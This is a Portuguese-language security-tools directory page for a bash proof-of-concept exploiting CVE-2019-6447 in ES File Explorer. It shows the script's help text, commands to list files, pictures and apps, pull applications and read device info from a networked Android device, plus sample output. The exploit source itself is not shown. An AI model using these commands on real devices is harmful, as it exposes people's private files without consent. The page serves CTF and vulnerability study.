Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC-ES-File-Explorer-CVE-2019-6447 — Script bash muito básico para explorar o CVE-2019-6447. | Kitploit
Ferramentas/GitHubGitHub/julio-cfa/poc-es-file-explorer-cve-2019-6447
Segurança AndroidAnálise de VulnerabilidadesExploraçãoExfiltração de DadosColeta de InformaçõesSegurança Móvel
GitHubjulio-cfa/poc-es-file-explorer-cve-2019-6447

POC-ES-File-Explorer-CVE-2019-6447

Script bash muito básico para explorar o CVE-2019-6447.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 4 anosAinda não revisado

PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)

Esta é uma implementação muito simples em bash do CVE-2019-6447 PoC. Basicamente usa curl para enviar as requisições com os parâmetros corretos. Eu construí este script enquanto procurava por algo similar durante um CTF e não consegui encontrar nenhum. Você pode brincar com o script original e personalizá-lo da maneira que preferir.

Instalação:

Simplesmente clone o repositório e use o arquivo .sh.

root@kitploit:~
git clone [email protected]:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git

Ou copie e cole o conteúdo bruto em um arquivo.

Uso:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh -h                            

--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---

You can try the following commands: 

listFiles	List all files
listPics	List all pictures
listVideos	List all videos
listAudios	List all audios
listApps	List all applications installed
listAppsSystem	List system apps
listAppsPhone	List communication related applications
listAppsSdcard	List the apps installed on the sd card
listAppsAll	List all applications
getAppThumbnail	List icons for the specified application
appLaunch	Start the developed application
appPull         Download an application from your device
getDeviceInfo	Get system information

Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles

Exemplo:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles                                                                               
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", }, 
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", }, 
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", }, 
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]

Referências:

Caso você esteja curioso sobre como este exploit funciona nos bastidores OU caso ele falhe e você precise construir seu próprio script, você pode dar uma lida nos seguintes links:

https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566

Baixar ferramenta